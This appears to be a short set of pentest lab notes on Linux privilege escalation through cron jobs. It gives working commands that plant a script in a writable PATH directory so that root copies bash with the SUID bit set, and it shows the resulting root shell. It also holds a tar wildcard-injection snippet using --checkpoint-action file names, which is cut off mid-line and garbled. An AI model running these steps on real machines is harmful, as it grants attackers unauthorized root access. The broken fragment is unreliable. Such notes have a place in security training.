Home

Schedualed tasks

  • Cron Path

  • Cron wilcard

Cron Path escalation

user@debian:~$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin  <----------------

# m h dom mon dow user	command
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
* * * * * root overwrite.sh
* * * * * root /usr/local/bin/compress.sh

so there are 2 things that make this possible

PATH=/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin  <----------------
     ^^^^^^^^^^
* * * * * root overwrite.sh <------- a missing file
* * * * * root /usr/local/bin/compress.sh

so what we can do is basically create our own overwrite.sh in the /home/user directory

echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/overwrite.sh
chmod +x /home/user/overwrite.sh

user@debian:~$ echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/overwrite.sh
user@debian:~$ chmod +x overwrite.sh
user@debian:~$ ls -la /tmp
total 1108
drwxrwxrwt  2 root root   4096 Mar 10 13:06 .
drwxr-xr-x 22 root root   4096 Jun 17  2020 ..
-rw-r--r--  1 root root 181541 Mar 10 13:06 backup.tar.gz
-rwsr-sr-x  1 root root 926536 Mar 10 13:06 bash
-rw-r--r--  1 root root     29 Mar 10 13:05 useless
TCM@debian:~$ /tmp/bash -p
bash-4.1# id
uid=1000(TCM) gid=1000(user) euid=0(root) egid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),1000(user)

ash /tmp/bash; chmod +s /tmp/bash' > /home/andre/backup/runme.sh


touch /home/andre/backup/--checkpoint=1
touch /home/andre/backup/--checkpoint-action=exec=sh\ runme.sh

PreviousCapabilitiesNextOverwrite

Last updated